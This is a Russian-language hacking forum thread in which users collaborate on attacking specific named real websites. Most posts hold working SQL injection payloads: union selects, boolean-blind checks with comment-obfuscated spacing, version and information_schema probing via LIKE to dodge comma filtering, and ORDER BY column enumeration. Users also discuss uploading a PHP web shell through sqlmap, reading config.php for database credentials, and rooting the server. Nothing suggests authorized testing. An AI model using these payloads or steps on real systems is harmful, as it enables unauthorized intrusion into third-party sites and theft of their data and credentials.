05.04.2017, 20:14
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от DezMond™
↑
помогите вывод сделать, тайм бейс не крутит(
Код:
https://www.denkmalschutz.de/denkmale-erleben/terminkalender.html?tx_igcalendar_pi1[termin][eventSuche]=1&tx_igcalendar_pi1[state]=118)+union/**//**//**/select+1+--+
вывод через union мне добиться не удалось, но там boolen есть
Код:
118)/**/AND/**/1=2+--+s' | grep 'event_417'
118)/**/AND/**/1=1+--+s' | grep 'event_417'
хм что интересно функции substring,mid,right,left по какой то причине на работают.. но нормально работает like, версия базы 5.6
Код:
118)/**/AND/**/version()*1+like+%275.6%%27+--+s' | grep 'event_417'
к information_schema тоже доступ есть
Код:
118)/**/AND/**/(select+table_name+from+information_schema.tables+limit+1)+like+%27%%27+--+s' | grep 'event_417'
ещё там операция = не всегда работает, лучше юзать like
скульмап по какой то причине в упор скулю не видит
-----------
чорт, там запятая фильтруется -_-
|
|
|
05.04.2017, 22:04
|
|
Новичок
Регистрация: 31.03.2017
Сообщений: 10
С нами:
4800566
Репутация:
0
|
|
Сообщение от ACat
↑
можно. Можно к примеру попробовать рутнуть сервер.
$uname -a
p.s. а если нету прав - поискать где есть. к примеру папки с аватарками.
Ну если честно, upload там спокойно льётся через sqlmap, но если потом через этот upload лить shell, то он не выполняется, ощущение такое как будто нет поддержки php :/
|
|
|
|
05.04.2017, 22:12
|
|
Новичок
Регистрация: 31.03.2017
Сообщений: 10
С нами:
4800566
Репутация:
0
|
|
Сообщение от BabaDook
↑
не выполняется потому что php не отрабатывает
Именно
|
|
|
|
05.04.2017, 22:16
|
|
Новичок
Регистрация: 31.03.2017
Сообщений: 10
С нами:
4800566
Репутация:
0
|
|
Сообщение от BabaDook
↑
Это потому что шелл не отрабатывает?
В общем, заливаю upload, через него заливаю шелл, открыв его сервер его не обрабатывает как php, а выводит просто текст с кодом.
Хотя upload работает нормально.
Сообщение от None
шелл на html?
php
|
|
|
|
06.04.2017, 04:26
|
|
Участник форума
Регистрация: 10.03.2017
Сообщений: 159
С нами:
4830806
Репутация:
0
|
|
Сообщение от t0ma5
↑
вывод через union мне добиться не удалось, но там boolen есть
Код:
118)/**/AND/**/1=2+--+s' | grep 'event_417'
118)/**/AND/**/1=1+--+s' | grep 'event_417'
хм что интересно функции substring,mid,right,left по какой то причине на работают.. но нормально работает like, версия базы 5.6
Код:
118)/**/AND/**/version()*1+like+%275.6%%27+--+s' | grep 'event_417'
к information_schema тоже доступ есть
Код:
118)/**/AND/**/(select+table_name+from+information_schema.tables+limit+1)+like+%27%%27+--+s' | grep 'event_417'
ещё там операция = не всегда работает, лучше юзать like
скульмап по какой то причине в упор скулю не видит
-----------
чорт, там запятая фильтруется -_-
Сообщение от l0mt1k
↑
Ну если честно, upload там спокойно льётся через sqlmap, но если потом через этот upload лить shell, то он не выполняется, ощущение такое как будто нет поддержки php :/
Стоп, что-то я не понял... Есть иньжект, sqlmap раскрутил его, залил через mysql в файл.php код и код не исполняется?
Ааа, понял, в папке, куда залит шелл нету прав...
Попробуй прочитать конфиг.php. Там будет логин и пароль подключения к БД.
ssh mysql@server
|
|
|
|
06.04.2017, 14:10
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
мимо, sqlmap не видит самую простую инъекцию and 1=1/and 1=2 впрочем даже если бы видел тамперы там не помогут, фильтруются запятые, плюс некоторые запросы чуть меняешь логику - не отрабатывают, там проще свой скрипт набросать
|
|
|
|
07.04.2017, 11:05
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
чё можно сделать?
Код:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604'
|
|
|
|
07.04.2017, 14:00
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 14
С нами:
8953911
Репутация:
0
|
|
Сообщение от DezMond™
↑
чё можно сделать?
Код:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604'
Код:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604)+order+by+24+--+-
|
|
|
|
07.04.2017, 14:11
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
Сообщение от ZodiaX
↑
Код:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604)+order+by+24+--+-
а дальше? какой толк подбирать колонки, если нет вывода?
|
|
|
|
07.04.2017, 14:37
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 14
С нами:
8953911
Репутация:
0
|
|
Сообщение от DezMond™
↑
а дальше? какой толк подбирать колонки, если нет вывода?
Да, сорри, думал как слепую можно раскрутить, ан нет.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
